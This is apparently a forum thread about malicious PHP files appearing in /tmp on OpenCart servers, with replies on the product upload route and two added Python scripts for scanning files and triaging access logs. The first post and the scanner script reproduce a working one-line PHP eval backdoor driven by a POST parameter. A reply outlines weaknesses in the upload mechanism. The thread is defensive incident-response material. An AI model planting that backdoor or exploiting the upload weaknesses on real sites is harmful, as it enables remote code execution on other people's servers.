Post by garyw75 » Thu Aug 15, 2019 3:30 pm

We are a design agency purely running Opencart on our servers. Versions we have installed range from 1.5.6.4 upwards.

Our malware and virus software on the webserver is starting to pick up files in the /tmp folder. The files are Opencart session files so we believe Opencart's upload functionality is the source of the file creation.

During the night we see mainly different 1.5.6.4 installs being used to create the files but there has been one or two instances of version 3 installs doing it.

-rw------- 1 website website 1400195 Aug 13 16:26 20190813-162642-XVLWsnW@S2pF81WGLe3uagAAAA0-file-uLQeCe

The files contain malicious code like this:-

EEC4D8E4439299046B8CDB3F782<?php @preg_replace("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>[root@host tmp]#

On checking the logs we can see automated crawlers scanning the server for upload scripts but I'm unsure what to look for in terms of any Opencart upload functionality:-

[12/Aug/2019:22:28:23 +0100] "POST /chat/upload.php HTTP/1.1" 301 537 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:23 +0100] "POST /Chat/upload.php HTTP/1.1" 301 481 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:23 +0100] "POST /en/upload.php HTTP/1.1" 301 477 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:24 +0100] "POST /chat/FlashChat_v608/chat/upload.php HTTP/1.1" 301 521 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

+ 100s more

They are obviously scanning for vulnerable upload pages in all different types of software. Presumably one of the checks is for Opencart and its upload functionality if it has in fact been compromised.

As I have already said we do not have anything else on the server apart from Opencart. I have checked the CVE Details website for any new vulnerabilities but nothing is listed.

Can anyone check if they are experiencing the same thing, or offer any advice?

Thanks very much
Gary

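A defender reading the post above wants a quick way to find out which files in /tmp are data and which carry code. The script below is an added example, not code from the thread or from OpenCart: it walks a directory, and flags any file containing a PHP open tag or the exact construction quoted in the post (preg_replace with the /e modifier and a replacement taken from $_POST). The sample files it creates in a temporary directory are constructed for the demonstration.

```python
"""Scan a temp directory for files that carry PHP code where only data belongs.

Added example, not code from the forum thread or from OpenCart.  Session and
upload temp files in /tmp should hold serialized data, never a PHP open tag.
The most specific indicator below is the construction quoted in the first post:
preg_replace with the /e modifier (removed in PHP 7) and a replacement taken
straight from $_POST, which evaluates whatever the request supplies.
"""
import os
import re
import tempfile
from typing import Dict, List

INDICATORS = {
    # preg_replace("<pattern>/e", $_POST[...], ...): delimiters and flags vary,
    # so match any pattern literal whose modifier list contains 'e', followed
    # by a request superglobal as the replacement argument.
    "preg_replace_e_with_request_input": re.compile(
        rb'preg_replace\s*\(\s*["\'][^"\']*[^"\'\w][a-zA-Z]*e[a-zA-Z]*["\']'
        rb'\s*,\s*\$_(?:POST|GET|REQUEST|COOKIE)\b',
        re.IGNORECASE,
    ),
    # Any PHP open tag at all is out of place in a session or upload temp file.
    "php_open_tag": re.compile(rb'<\?(?:php\b|=)', re.IGNORECASE),
}


def scan_bytes(data: bytes) -> List[str]:
    """Return the names of all indicators that match the file contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(data)]


def scan_dir(path: str, max_size: int = 8 * 1024 * 1024) -> Dict[str, List[str]]:
    """Map each suspicious file under `path` to the indicators it triggered.

    Symlinks and oversized files are skipped; unreadable files (for example
    another user's sessions) are skipped rather than aborting the run.
    """
    findings: Dict[str, List[str]] = {}
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            try:
                if os.path.islink(full) or os.path.getsize(full) > max_size:
                    continue
                with open(full, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            hits = scan_bytes(data)
            if hits:
                findings[full] = hits
    return findings


# Constructed sample contents: a normal PHP-serialized session, and the payload
# shape quoted in the post (the leading hex run is part of that quote).
BENIGN_SESSION = b'language|s:5:"en-gb";currency|s:3:"GBP";cart|a:0:{}'
SUSPECT_UPLOAD = (
    b'EEC4D8E4439299046B8CDB3F782'
    b'<?php @preg_replace("/[pageerror]/e",$_POST[\'xbfk\'],"saft"); ?>'
)


def demo() -> Dict[str, List[str]]:
    """Write the two constructed files to a scratch directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        samples = (("sess_benign", BENIGN_SESSION), ("20190813-uploaded-file", SUSPECT_UPLOAD))
        for name, content in samples:
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(content)
        findings = scan_dir(tmp)
    # Report basenames so the result does not depend on the scratch path.
    return {os.path.basename(p): hits for p, hits in findings.items()}


if __name__ == "__main__":
    for path, hits in demo().items():
        print(f"{path}: {', '.join(hits)}")
```

Run it against the real directory with `scan_dir("/tmp")`; the `php_open_tag` indicator will also catch payloads that do not use preg_replace at all, while the specific indicator tells you the file matches the pattern seen in this thread.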

Post by ADD Creative » Fri Aug 16, 2019 5:03 am

It's possible to upload files using the product upload feature in 1.5.6.4. You need to look in your logs for access to /index.php?route=product/product/upload

An uploaded file will initially go to the PHP upload_tmp_dir. However, it will then be moved to the OpenCart DIR_DOWNLOAD directory with a random token added to the filename. There were a few weaknesses with this system. The random number generator used for the token is not considered secure. The new filename is returned in the response encrypted, but only weakly. Earlier OpenCart versions set the encryption key in the settings to a common value.

If you are worried about file upload and you don't have products that require a customer to upload an image file, it's probably best to comment out the upload function in /catalog/controller/product/product.php.

www.add-creative.co.uk


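Putting the two posts together, the log check a practitioner would run is: flag every POST to a path ending in upload.php (the mass scanning shown in the first post) and every request to index.php?route=product/product/upload (the route pointed out in the reply), then look first at any hit on that route that was actually served with a 2xx rather than redirected with a 301. The following script is an added example, not code from the thread or from OpenCart. It parses Apache/nginx combined-format lines; the sample lines are constructed by prepending documentation-range client IPs to the lines quoted in the first post and adding two further lines, one normal page view and one POST to the upload route.

```python
"""Access-log triage for upload probes and the OpenCart product upload route.

Added example, not code from the thread or from OpenCart.  It parses combined
log format lines and flags two things the thread points at:
  * POSTs to any path ending in upload.php (the mass scanning in the first post)
  * any request to index.php?route=product/product/upload (the route the reply
    suggests checking)
Sample lines are constructed; the IPs are documentation-range placeholders.
"""
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Optional
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?:\d+|-) "[^"]*" "(?P<ua>[^"]*)"$'
)

UPLOAD_ROUTE = "product/product/upload"


class Hit(NamedTuple):
    ip: str
    time: str
    method: str
    target: str
    status: int
    reason: str


def classify(method: str, target: str) -> Optional[str]:
    """Return a reason label for requests worth a second look, else None."""
    parts = urlsplit(target)
    route = parse_qs(parts.query).get("route", [""])[0].strip("/").lower()
    if route == UPLOAD_ROUTE:
        return "opencart_product_upload"
    if method == "POST" and parts.path.lower().endswith("upload.php"):
        return "generic_upload_probe"
    return None


def triage(lines: List[str]) -> List[Hit]:
    """Parse each line and keep the ones that classify() flags."""
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparsable line; in production count these rather than drop them
        reason = classify(m["method"], m["target"])
        if reason:
            hits.append(Hit(m["ip"], m["time"], m["method"], m["target"], int(m["status"]), reason))
    return hits


def summarize(hits: List[Hit]) -> Dict[str, object]:
    """Aggregate hits.  A 2xx on the OpenCart upload route is the one to review
    first: a 301, as in the thread's log, means the probe was only redirected."""
    return {
        "by_reason": dict(Counter(h.reason for h in hits)),
        "by_ip": dict(Counter(h.ip for h in hits)),
        "review": [h for h in hits if h.reason == "opencart_product_upload" and 200 <= h.status < 300],
    }


UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
SAMPLE_LOG = [
    # The four probes quoted in the first post, with a constructed client IP prepended.
    f'203.0.113.10 - - [12/Aug/2019:22:28:23 +0100] "POST /chat/upload.php HTTP/1.1" 301 537 "-" "{UA}"',
    f'203.0.113.10 - - [12/Aug/2019:22:28:23 +0100] "POST /Chat/upload.php HTTP/1.1" 301 481 "-" "{UA}"',
    f'203.0.113.10 - - [12/Aug/2019:22:28:23 +0100] "POST /en/upload.php HTTP/1.1" 301 477 "-" "{UA}"',
    f'203.0.113.10 - - [12/Aug/2019:22:28:24 +0100] "POST /chat/FlashChat_v608/chat/upload.php HTTP/1.1" 301 521 "-" "{UA}"',
    # Constructed: an ordinary product page view, must not be flagged.
    f'203.0.113.20 - - [12/Aug/2019:22:30:01 +0100] "GET /index.php?route=product/product&product_id=42 HTTP/1.1" 200 18342 "-" "{UA}"',
    # Constructed: a POST to the OpenCart product upload route that was actually served.
    f'203.0.113.77 - - [12/Aug/2019:23:02:17 +0100] "POST /index.php?route=product/product/upload HTTP/1.1" 200 93 "-" "{UA}"',
]

if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for h in found:
        print(f"{h.ip:15} {h.status} {h.reason:26} {h.method} {h.target}")
    print(summarize(found)["by_reason"])
```

Feed it real lines with `triage(open("/var/log/apache2/access.log").readlines())`; the `review` list is where to start, and `by_ip` gives the sources to compare against the timestamps of the files turning up in /tmp.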

Post by garyw75 » Fri Aug 16, 2019 9:13 pm

Thanks very much for the pointer. I will take a look at this and lock down the sites.
Thanks again
Gary
